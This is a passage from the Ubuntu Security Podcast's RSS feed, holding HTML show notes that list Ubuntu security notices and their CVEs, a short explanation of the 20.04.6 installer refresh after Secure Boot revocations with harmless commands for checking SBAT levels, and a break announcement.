<li><a href="https://ubuntu.com/security/CVE-2022-31650">CVE-2022-31650</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-40426">CVE-2021-40426</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3643">CVE-2021-3643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23210">CVE-2021-23210</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23172">CVE-2021-23172</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23159">CVE-2021-23159</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13590">CVE-2019-13590</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33844">CVE-2021-33844</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Fix for one of the vulns fixed in the original update was incomplete</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-20-dot-04-dot-6-lts-released-09-49">Ubuntu 20.04.6 LTS Released [09:49]</h3>
<ul>
<li><a href="https://lists.ubuntu.com/archives/ubuntu-announce/2023-March/000287.html">https://lists.ubuntu.com/archives/ubuntu-announce/2023-March/000287.html</a></li>
<li><a href="https://wiki.ubuntu.com/FocalFossa/ReleaseSchedule">https://wiki.ubuntu.com/FocalFossa/ReleaseSchedule</a></li>
<li>Wasn&rsquo;t originally planned to be released</li>
</ul>
<blockquote>
<p>Unlike previous point releases, 20.04.6 is a refresh of the amd64
installer media after recent key revocations, re-enabling their usage
on Secure Boot enabled systems.</p>
<p>Many other security updates for additional high-impact bug fixes are also
included, with a focus on maintaining stability and compatibility with
Ubuntu 20.04 LTS.</p>
</blockquote>
<ul>
<li>TL;DR - recent vulnerabilities in shim and grub meant that we revoked those
old versions such that they would not boot anymore if updates had been
installed - so if wanted to reinstall using the 20.04.5 media it would fail to
boot. Can prove this to yourself:</li>
</ul>
<!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>cat /sys/firmware/efi/efivars/SbatLevelRT-605dab50-e046-4300-abb6-3dd810dd8b23
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>sbat,1,2022052400
</span></span><span style="display:flex;"><span>grub,2
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>objdump -j .sbat -s grubx64.efi
</span></span></code></pre></div><h3 id="ubuntu-security-at-everything-open-2023-12-02">Ubuntu Security at Everything Open 2023 [12:02]</h3>
<ul>
<li><a href="https://ubuntu.com/blog/everything-open-2023-in-melbourne">https://ubuntu.com/blog/everything-open-2023-in-melbourne</a></li>
<li><a href="https://2023.everythingopen.au/schedule/presentation/64/">https://2023.everythingopen.au/schedule/presentation/64/</a></li>
<li>Presented about how the Ubuntu Security keeps Ubuntu secure and also gave
advice on how you can improve the security of your own open source projects</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E191.mp3" length="15120065" type="audio/mpeg" /><itunes:duration>863</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 190
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-190/</link>
          <pubDate>Fri, 10 Mar 2023 19:30:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>1255b6fcf82a7c234f903214983591518ad373ccbe13e6ba99ffa91094749a9875868cae16d88fef6da4405c36e43e2fa44b8b8262d30646cd16d5fa72ba45c8</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 190</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          The Ubuntu Security Podcast is on a two week break to focus on [Everything Open
  2023](https://2023.everythingopen.au/) in Melbourne next week - come hear Alex talk about [Securing a distribution
  and securing your own open source...
        
        ]]></itunes:subtitle>
        <itunes:summary>  The Ubuntu Security Podcast is on a two week break to focus on [Everything Open
  2023](https://2023.everythingopen.au/) in Melbourne next week - come hear Alex talk about [Securing a distribution
  and securing your own open source project](https://2023.everythingopen.au/schedule/presentation/64/) in person if you can.
  </itunes:summary>
        <description>  The Ubuntu Security Podcast is on a two week break to focus on [Everything Open
  2023](https://2023.everythingopen.au/) in Melbourne next week - come hear Alex talk about [Securing a distribution
  and securing your own open source project](https://2023.everythingopen.au/schedule/presentation/64/) in person if you can.
  </description>
        <googleplay:description>  The Ubuntu Security Podcast is on a two week break to focus on [Everything Open
  2023](https://2023.everythingopen.au/) in Melbourne next week - come hear Alex talk about [Securing a distribution
  and securing your own open source project](https://2023.everythingopen.au/schedule/presentation/64/) in person if you can.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>The Ubuntu Security Podcast is on a two week break to focus on <a href="https://2023.everythingopen.au/">Everything Open
2023</a> in Melbourne next week - come hear Alex talk about <a href="https://2023.everythingopen.au/schedule/presentation/64/">Securing a distribution
and securing your own open source project</a> in person if you can.</p>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E190.mp3" length="1913825" type="audio/mpeg" /><itunes:duration>80</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 189
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-189/</link>
          <pubDate>Fri, 03 Mar 2023 22:22:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>bca2d45a7516db688f25bebc16bb75c7a06eacc9a37fbdc7b2f6cc73d8eafed0e4fc6a51b00f536b4ebd6d5fd5e1bc66bc27b902217989e68fcef5c045dc861f</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 189</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we dive into the BlackLotus UEFI bootkit teardown and find out how
  this malware has some roots in the FOSS ecosystem, plus we look at security
  updates for the Linux kernel, DCMTK, ZoneMinder, Python, tar and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we dive into the BlackLotus UEFI bootkit teardown and find out how
  this malware has some roots in the FOSS ecosystem, plus we look at security
  updates for the Linux kernel, DCMTK, ZoneMinder, Python, tar and more.
  </itunes:summary>
        <description>  This week we dive into the BlackLotus UEFI bootkit teardown and find out how
  this malware has some roots in the FOSS ecosystem, plus we look at security
  updates for the Linux kernel, DCMTK, ZoneMinder, Python, tar and more.
  </description>
        <googleplay:description>  This week we dive into the BlackLotus UEFI bootkit teardown and find out how
  this malware has some roots in the FOSS ecosystem, plus we look at security
  updates for the Linux kernel, DCMTK, ZoneMinder, Python, tar and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we dive into the BlackLotus UEFI bootkit teardown and find out how
this malware has some roots in the FOSS ecosystem, plus we look at security
updates for the Linux kernel, DCMTK, ZoneMinder, Python, tar and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>111 unique CVEs addressed</p>
<h3 id="usn-5739-2-mariadb-regression-00-48">[<a href="https://ubuntu.com/security/notices/USN-5739-2">USN-5739-2</a>] MariaDB regression [00:48]</h3>
<ul>
<li>Affecting Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)</li>
<li>Latest point release had various memory and performance regressions</li>
</ul>
<h3 id="usn-5883-1-linux-kernel--hwe--vulnerabilities-01-05">[<a href="https://ubuntu.com/security/notices/USN-5883-1">USN-5883-1</a>] Linux kernel (HWE) vulnerabilities [01:05]</h3>
<ul>
<li>19 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0461">CVE-2023-0461</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43750">CVE-2022-43750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42895">CVE-2022-42895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42328">CVE-2022-42328</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41850">CVE-2022-41850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41849">CVE-2022-41849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39842">CVE-2022-39842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3649">CVE-2022-3649</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3646">CVE-2022-3646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3640">CVE-2022-3640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3628">CVE-2022-3628</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3545">CVE-2022-3545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3521">CVE-2022-3521</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29901">CVE-2022-29901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29900">CVE-2022-29900</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2663">CVE-2022-2663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26373">CVE-2022-26373</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20369">CVE-2022-20369</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4378">CVE-2022-4378</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 kernel backported from 18.04LTS to 16.04ESM</li>
<li>sysctl stack buffer overflow <a href="/episode-188/#usn-5877-1-linux-kernel--gke--vulnerabilities-01-06">discussed last week</a> plus a range of other kernel
vulns</li>
</ul>
<h3 id="usn-5884-1-linux-kernel--aws--vulnerabilities-01-26">[<a href="https://ubuntu.com/security/notices/USN-5884-1">USN-5884-1</a>] Linux kernel (AWS) vulnerabilities [01:26]</h3>
<ul>
<li>6 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-23559">CVE-2023-23559</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0045">CVE-2023-0045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42895">CVE-2022-42895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41858">CVE-2022-41858</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20566">CVE-2022-20566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4155">CVE-2021-4155</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 GA kernel from 16.04</li>
</ul>
<h3 id="usn-5882-1-dcmtk-vulnerabilities-01-36">[<a href="https://ubuntu.com/security/notices/USN-5882-1">USN-5882-1</a>] DCMTK vulnerabilities [01:36]</h3>
<ul>
<li>10 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-43272">CVE-2022-43272</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2121">CVE-2022-2121</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2120">CVE-2022-2120</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2119">CVE-2022-2119</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41690">CVE-2021-41690</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41689">CVE-2021-41689</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41688">CVE-2021-41688</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41687">CVE-2021-41687</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1010228">CVE-2019-1010228</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2015-8979">CVE-2015-8979</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>libraries and utils for handling DICOM (Digital Imaging and Communications in
Medicine) image files (used for radiology etc)</li>
<li>various memory corruption issues -&gt; DoS / code execution</li>
</ul>
<h3 id="usn-5885-1-apr-vulnerability-02-29">[<a href="https://ubuntu.com/security/notices/USN-5885-1">USN-5885-1</a>] APR vulnerability [02:29]</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24963">CVE-2022-24963</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Integer overflow -&gt; memory corruption -&gt; DoS / code exec</li>
</ul>
<h3 id="usn-5886-1-intel-microcode-vulnerabilities-02-44">[<a href="https://ubuntu.com/security/notices/USN-5886-1">USN-5886-1</a>] Intel Microcode vulnerabilities [02:44]</h3>
<ul>
<li>4 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-38090">CVE-2022-38090</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33972">CVE-2022-33972</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33196">CVE-2022-33196</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21216">CVE-2022-21216</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>latest upstream release from Intel</li>
<li>Various issues in SGX and out-of-band management - particularly on Intel Xeon
processors - allow require privileged access in the first place (ie admin) but
could allow to then say bypass SGX protections and the like</li>
</ul>
<h3 id="usn-5887-1-clamav-vulnerabilities-03-27">[<a href="https://ubuntu.com/security/notices/USN-5887-1">USN-5887-1</a>] ClamAV vulnerabilities [03:27]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-20052">CVE-2023-20052</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20032">CVE-2023-20032</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>latest upstream point release - 0.103.8</li>
<li>one in HFS+ and the other in the DMG parsers - both different filesystem
formats for Apple</li>
</ul>
<h3 id="usn-5889-1-zoneminder-vulnerabilities-03-49">[<a href="https://ubuntu.com/security/notices/USN-5889-1">USN-5889-1</a>] ZoneMinder vulnerabilities [03:49]</h3>
<ul>
<li>13 CVEs addressed in Xenial ESM (16.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-29806">CVE-2022-29806</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7331">CVE-2019-7331</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7332">CVE-2019-7332</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7330">CVE-2019-7330</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7328">CVE-2019-7328</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7327">CVE-2019-7327</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7326">CVE-2019-7326</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7329">CVE-2019-7329</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7325">CVE-2019-7325</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-6991">CVE-2019-6991</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-6992">CVE-2019-6992</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-6990">CVE-2019-6990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-6777">CVE-2019-6777</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Video surveillance software system - includes a web interface so has usual
types of issues and then some</li>
<li>Various XSS issues plus a stack buffer overflow in handling of username /
passwords as would use a fixed size buffer for these (what year is this?) and
a upload file handling issue resulting in possible remote code execution</li>
</ul>
<h3 id="usn-5890-1-open-vswitch-vulnerabilities-04-27">[<a href="https://ubuntu.com/security/notices/USN-5890-1">USN-5890-1</a>] Open vSwitch vulnerabilities [04:27]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-4338">CVE-2022-4338</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4337">CVE-2022-4337</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5891-1-usn-5894-1-curl-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5891-1">USN-5891-1</a>, <a href="https://ubuntu.com/security/notices/USN-5894-1">USN-5894-1</a>] curl vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-23916">CVE-2023-23916</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23915">CVE-2023-23915</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23914">CVE-2023-23914</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-43552">CVE-2022-43552</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22925">CVE-2021-22925</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22898">CVE-2021-22898</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5892-1-nss-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5892-1">USN-5892-1</a>] NSS vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0767">CVE-2023-0767</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3479">CVE-2022-3479</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5893-1-webkitgtk-vulnerabilities-04-34">[<a href="https://ubuntu.com/security/notices/USN-5893-1">USN-5893-1</a>] WebKitGTK vulnerabilities [04:34]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-23529">CVE-2023-23529</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>type confusion in webkit - Apple says that they had seen reports that this had
been actively exploited in the wild</li>
</ul>
<h3 id="usn-5896-1-rack-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5896-1">USN-5896-1</a>] Rack vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-30123">CVE-2022-30123</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30122">CVE-2022-30122</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5895-1-mplayer-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5895-1">USN-5895-1</a>] MPlayer vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-38861">CVE-2022-38861</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38866">CVE-2022-38866</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38864">CVE-2022-38864</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38863">CVE-2022-38863</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38858">CVE-2022-38858</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38855">CVE-2022-38855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38851">CVE-2022-38851</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38865">CVE-2022-38865</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38860">CVE-2022-38860</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38850">CVE-2022-38850</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5897-1-openjdk-vulnerabilities-04-55">[<a href="https://ubuntu.com/security/notices/USN-5897-1">USN-5897-1</a>] OpenJDK vulnerabilities [04:55]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-21843">CVE-2023-21843</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21835">CVE-2023-21835</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>openjdk 11 (aka lts), 17, 18</li>
<li>latest upstream point releases</li>
</ul>
<h3 id="usn-5898-1-openjdk-vulnerabilities-05-05">[<a href="https://ubuntu.com/security/notices/USN-5898-1">USN-5898-1</a>] OpenJDK vulnerabilities [05:05]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-21843">CVE-2023-21843</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21830">CVE-2023-21830</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>openjdk 8 - also latest upstream point release</li>
</ul>
<h3 id="usn-5888-1-python-vulnerabilities-05-09">[<a href="https://ubuntu.com/security/notices/USN-5888-1">USN-5888-1</a>] Python vulnerabilities [05:09]</h3>
<ul>
<li>6 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-24329">CVE-2023-24329</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45061">CVE-2022-45061</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42919">CVE-2022-42919</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-37454">CVE-2022-37454</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28861">CVE-2021-28861</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2015-20107">CVE-2015-20107</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>python3.9 - esm-apps</li>
<li>high priority - vuln in multiprocessing module - if used with forkserver on
Linux would allow pickles to be deserialized from any user on the same machine
in the same network namespace - therefore as one local user can easily get
code execution as another user on the same machine</li>
</ul>
<h3 id="usn-5899-1-awstats-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5899-1">USN-5899-1</a>] AWStats vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-46391">CVE-2022-46391</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5901-1-gnutls-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5901-1">USN-5901-1</a>] GnuTLS vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0361">CVE-2023-0361</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5902-1-php-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5902-1">USN-5902-1</a>] PHP vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0662">CVE-2023-0662</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0568">CVE-2023-0568</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0567">CVE-2023-0567</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5821-3-pip-regression">[<a href="https://ubuntu.com/security/notices/USN-5821-3">USN-5821-3</a>] pip regression</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-40898">CVE-2022-40898</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5903-1-lighttpd-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5903-1">USN-5903-1</a>] lighttpd vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-41556">CVE-2022-41556</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22707">CVE-2022-22707</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5638-4-expat-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5638-4">USN-5638-4</a>] Expat vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-43680">CVE-2022-43680</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40674">CVE-2022-40674</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5900-1-tar-vulnerability-06-15">[<a href="https://ubuntu.com/security/notices/USN-5900-1">USN-5900-1</a>] tar vulnerability [06:15]</h3>
<ul>
